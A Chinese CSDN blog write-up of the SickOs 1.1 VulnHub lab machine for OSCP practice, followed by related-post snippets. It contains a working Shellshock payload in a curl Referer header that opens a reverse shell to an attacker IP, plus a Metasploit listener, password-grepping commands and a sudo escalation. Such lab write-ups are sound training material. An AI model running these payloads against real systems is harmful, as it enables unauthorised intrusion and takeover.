OSCP Sickos 1.1 靶机渗透

最新推荐文章于 2023-08-13 18:17:09 发布
最新推荐文章于 2023-08-13 18:17:09 发布
阅读量332 收藏 2
点赞数
分类专栏: OSCP 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34935231/article/details/115134592
版权

Sickos 1.1 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-03-23

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0

Sickos 1.1主机ip为172.16.1.10

nmap 扫描一下

nmap -p- -A 172.16.1.10

主机开放了代理服务器,我们尝试用代理服务器扫描

nikto -h 172.16.1.10 --useproxy 172.16.1.10:3128

发现robots.txt 我们设置代理服务器查看文件

发现了/wolfcms目录,打开看看,没什么可用的,我们回到刚才nikto检测结果,提示/cgi-bin/status 对shellcode易受威胁,我们看下能否反弹shell

二、web渗透

开启msf监听

msfconsole

use multi/handler

set lhost 172.16.1.4

set lport 4444

set payload linux/x86/shell/reverse_tcp

run

开启另一个窗口发起请求,准备反弹shell

curl -v --proxy 172.16.1.10:3128 http://172.16.1.10/cgi-bin/status -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /bin/bash -i >& /dev/tcp/172.16.1.4/4444 0>&1"

成功反弹shell

三、提权

切换交互式shell 

/bin/sh

查看passwd文件,发现sickos用户

cat /etc/passwd

尝试寻找密码

find / -maxdepth 4 -name *.php -type f 2>/dev/null | xargs grep -C 3 -i pass

配置文件里面竟然有密码,为john@123

尝试切换用户

su sickos

成功切换到sickos用户

使用sudo命令切换到root用户

sudo su root

成功切换到root用户

四、总结

总体来说没什么难度

c2hhZG93
关注
专栏目录
oscp raven2靶机渗透过程
shatianyzg的博客
07-05 370
信息侦察阶段 用dirb扫描发现以下信息 ---- Entering directory: http://172.16.100.142/vendor/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode ‘-w’ if you want to scan it anyway) 找到第一个flag 寻找PHPMailer 5.2.16 的exp searchsploit phpmailer 拷贝exp到当前目录利用40
OSCP-Vulnhub靶机记录-digitalworldlocal-fall
深入交流学习:webMsec
09-30 270
-hh 隐藏char值为80的结果(错误的参数都这里报80,第一次wfuzz没有加此参数)尝试用读取/home/qiu目录下默认存ssh密钥文件,通过前面扫描端口知道他是开了ssh的。vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。再回leafpad,搜索一下“enum”,看看枚举出什么目录。复制保存到攻击机,key文件最后要有一个回车,否则登录不上去。这里的GET参数是 file,可以尝试文件包含。那么,我们可以试一下,用哪个参数可以拼接进去。ls 一下,提示我们是低权限用户。
Vulnhub靶机系列:SickOs: 1.1
汗的博客
04-19 1178
这次的靶机是Vulnhub靶机靶机地址及相关描述 靶机设置 利用知识及工具 信息收集并getshell 提权 总结
VulnHub靶机-SickOs1.1
Slow_的博客
02-22 862
VulnHub靶机-SickOs1.1 下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 下载靶机后在VMware Workstation下打开,网卡配置为桥接 任务:提权并获取flag 攻击机:kali linux 192.168.8.195 靶机:192.168.8.194 文章目录VulnHub靶机-SickOs1.1一、信息搜集二、Getshell三、提权 一、信息搜集 nmap探测存活主机,找到目标靶机 命令:nmap -sP 192.168.
红队渗透靶场之SickOs1.1
xf555er的博客
12-06 1095
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
vulhub——SickOs: 1.1
战神/calmness的博客
06-04 552
下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 目标机器地址:192.168.243.137 攻击机器地址:192.168.18.148 目录 信息收集 扫描 设置代理 wolfcms 上传木马 并且 访问 SSH登录 sudo提权 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubunt..
VulnHub-SickOs1.1
热门推荐
江左盟的博客
07-07 1万+
信息收集 使用 漏洞发现 漏洞利用
oscp靶机教程
最新发布
weixin_68723119的博客
08-13 406
1.使用命令 arp-scan -l 列出当前局域网的所有设备,在oscp的网络适配器查看到的mac地址和扫描出来的192.168.211.141的MAC地址一致。先找一下有哪些我们可以利用的了,目前我们的用户是普通用户可以通过find命令找找一些特权命令,借助它可以从普通用户提升为root。找网站使用base64对内容进行解密,好家伙,是ssh连接私钥,找到宝了。只有一个用户“oscp”,要么它就是root,要么就是它是唯二用户。看到了bash,很亲切,去gtfobin搜索一下提权方法。
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
OSCP - SickOS:1.1 writeup
Jiajiajiang_的博客
04-15 716
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover 地址为10.0.3.143 nmap nmap -sV -p- 10.0.3.143 漏扫 想了一下突破口肯定不是ssh,就从3128端口入手把...
Vulnhub靶机SickOs1.1渗透
xingjinhao123的博客
02-26 329
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 目标是获取root目录下的a0216ea4d51874464078c618298b1367.txt文件 发布日期是2015年11月 运行环境: 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.76 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 获取靶机IP地址 扫描端口,没有发现熟悉的80端口 使用nikto简单扫一下312
红队打靶:SickOS1.1详细打靶思路(vulnhub)
Bossfrank的博客
06-07 1663
本文是vulnhub靶机sickos详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。本文使用了squid代理分析+wolfcms渗透的思路获取shell。下一篇文章将详述利用shellshock漏洞进行渗透的思路。
Vulhub sickos1.1
hee_mee的博客
05-06 339
NilZero
SickOs1.1--靶机实操详解
qq_61802750的博客
08-05 335
所以我们要去找到它的管理员路径。这个系统没有做多少的自定义的功能,还是老旧的系统,我们可以通过:1.猜测;这样的话我们有理由去推测:整个系统就是administertor,所以我们能不能找到它的凭据,从而利用它的身份。这样我们就得到了一个root用户,但我们无法得出是22端口的ssh用户还是3128端口的用户。打开浏览器,对3128端口和8080端口进行访问,虽然说8080端口是关闭的,但我们还是要进行尝试。好了,我们看到了wolfcms的这么一个内容管理系统,那么在这个系统中,artcles中,有。
Vulnhub靶机SICKOS_ 1.1
LainWith的博客
12-09 683
SickOs(此系列共2台)发布日期:2015年12月11日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描代理扫描搜寻网站后台后台写入shell计划任务提权破壳漏洞拿shell。
vulnhub靶场,SICKOS: 1.1
kukudeshuo的博客
12-07 4299
vulnhub靶场,SICKOS: 1.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 攻击机:kali(192.168.109.128) 靶机SICKOS: 1.1(192.168.109.189) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.189 使用nmap扫描查看目标
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 1936
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
红队打靶:SickOS1.1详细打靶思路之shellshock漏洞利用(vulnhub)
Bossfrank的博客
06-08 755
本文详述了vulnhub靶机sickOS1.1的打靶过程。本文利用了bash漏洞shellshock获取初始立足点,并使用定时任务进行提权。不同于单纯的writeup,本文更注重打靶每一步的思路用意。本文涉及的知识点包括nikto扫描、shellshock漏洞利用、msfvenom生成payload、定时任务提权等。采用squid代理分析+web渗透cms后台获取root权限的思路详见我的上一篇博客。
SICKOS: 1.1(内含两种解法)
Mysmycbx的博客
03-18 723
但是通过阅读博客,没有啥信息,web上也不到默认用户和密码。扫3128,也扫不到任何东西,那就把3128做代理扫描80端口,扫描到几个文件,一一查看。发现可以编辑php代码,直接写入反弹shell,go。写入,保存,监听,访问,一气呵成。没扫到啥有用的信息,但是博客肯定有后台呀,这里没有搜到,去网上去搜搜。原来是定时执行connect.py文件,那就构造个反弹shell,写入文件中。通过阅读web目录下的文件,发现了数据库连接文件,发现到一个密码。通过搜索,发现3128端口是负责代理的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c2hhZG93

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值